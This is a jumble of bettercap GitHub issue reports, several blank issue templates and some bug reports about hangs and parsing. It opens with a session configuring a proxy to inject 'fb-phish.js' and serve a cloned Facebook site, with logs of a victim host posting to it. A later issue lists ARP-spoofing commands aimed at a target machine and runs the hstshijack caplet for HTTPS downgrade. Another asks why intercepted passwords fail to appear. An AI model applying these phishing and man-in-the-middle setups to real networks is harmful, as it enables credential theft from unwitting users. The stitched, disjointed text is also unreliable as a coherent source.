http.proxy (A full featured HTTP proxy that can be used to inject malicious contents into webpages, all HTTP traffic will be redirected to it.)

  http.proxy.sslstrip : false
  http.port : 80
  http.proxy.address : <interface address>
  http.proxy.port : 8080
  http.proxy.script : caplets/fb-phish.js

http.server (A simple HTTP server, to be used to serve files and scripts across the network.)

  http.server.path : caplets/www/www.facebook.com/
  http.server.address : 0.0.0.0
  http.server.port : 80
  http.server.certificate : 
  http.server.key : 

net.recon (Read periodically the ARP cache in order to monitor for new hosts on the network.)
192.168.8.0/24 > 192.168.8.16  » [14:40:49] [sys.log] [inf] (httpd) [ GET localhost/osd.xml
192.168.8.0/24 > 192.168.8.16  » [14:40:56] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:41:56] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:42:19] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:42:19] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:42:36] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/ajax/webstorage/process_keys/
192.168.8.0/24 > 192.168.8.16  » [14:43:20] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:43:43] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:43:44] [sys.log] [inf] (httpd) 192.168.8.16 GET 192.168.8.16/
192.168.8.0/24 > 192.168.8.16  » [14:43:45] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:43:45] [sys.log] [inf] (httpd) 192.168.8.16 GET 192.168.8.16/osd.xml
192.168.8.0/24 > 192.168.8.16  » [14:43:46] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/cookie/consent/
192.168.8.0/24 > 192.168.8.16  » [14:43:46] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:45:51] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:48:21] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » 

ref: https://github.com/bettercap/caplets/issues/13

Done

bettercap v2.2 and 2.3 become hung in both wifi.recon and net.probe modules without any additional interaction, only time.

Environment

Please provide:

• Bettercap 2.3
• Kali2018.1
• go version go1.9.2 linux/amd64
• sudo ./bettercap -debug -iface wlan1
• No caplets needed, both just wifi.recon on wlan or net.probe on eth devices hang after a period of time. In my debug session, I issued several commands as it seems more arbitrary commands speed this up. However, just executing bettercap and only wifi.recon on or net.probe on will result in a hang after some time, usually when you come back to session and execute a command. Full debug here:

https://pastebin.com/xn0Ri2s0

1. Execute bettercap 2.2 or 2.3 with -iface wlan* or -iface eth*
2. Wait....
3. Execute a command

Expected behavior: What you expected to happen Expected bettercap console not to hang

Actual behavior: What actually happened Bettercap console hangs with or without much interactive activity, but activity seems to accelerate this and lessen the time that bettercap responds.

♥ ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY ♥

I have enabled all the modules but when i am able to login in the same computer browser on http its not showing any password or header on the bettercap 2. If i have missed anything help me out!

Thank You!

Prerequisites

Please, before creating this issue make sure that you read the README, that you are running the latest stable version and that you already searched other issues to see if your problem or request was already reported.

! PLEASE REMOVE THIS PART AND LEAVE ONLY THE FOLLOWING SECTIONS IN YOUR REPORT !

Description of the bug or feature request

Environment

Please provide:

• Bettercap version you are using ( bettercap -version ).
• OS version and architecture you are using.
• Go version if building from sources.
• Command line arguments you are using.
• Caplet code you are using or the interactive session commands.
• Full debug output while reproducing the issue ( bettercap -debug ... ).

Steps to Reproduce

1. First Step
2. Second Step
3. and so on...

Expected behavior: What you expected to happen

Actual behavior: What actually happened

--

♥ ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY ♥

I am using bettercap on mac m1. version v2.32.0

I am trying the hstshijack caplet. I am doing the following

net.probe on
net.recon on
set arp.spoof.fullduplex true
set arp.spoof.targets <MyTargetWindowsMachine>
arp.spoof on
set net.sniff.local true
net.sniff on

and then I run the hstshijack caplet.

Everything is running without error. However When I try to open any website like stackoverflow.com or linkedin.com on my target machine https version of the webpage is loaded. I have all my browser data, cache cleared before testing.

Any idea why https is loading and not http ?

Hi, on my system netstat -rn46 contains a short description in my mother tongue as the first line of the output, which breaks the routing table parser.

Another person reported the same problem I observed locally here: #1000

upon setting the prompt value to something else with the set $ PROMPT_VALUE command, the change happens but doesn't persist upon the next time I run bettercap. On my terminal, with the default prompt, the visibility is bad so I need to change it.

When i use bettercap after arp.spoof.on the target lost Internet connection why?

Description of the bug or feature request

Environment

Please provide:

• Bettercap version you are using ( bettercap -version ).
• OS version and architecture you are using.
• Go version if building from sources.
• Command line arguments you are using.
• Caplet code you are using or the interactive session commands.
• Full debug output while reproducing the issue ( bettercap -debug ... ).

Steps to Reproduce

1. First Step
2. Second Step
3. and so on...

Expected behavior: What you expected to happen

Actual behavior: What actually happened

--

♥ ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY ♥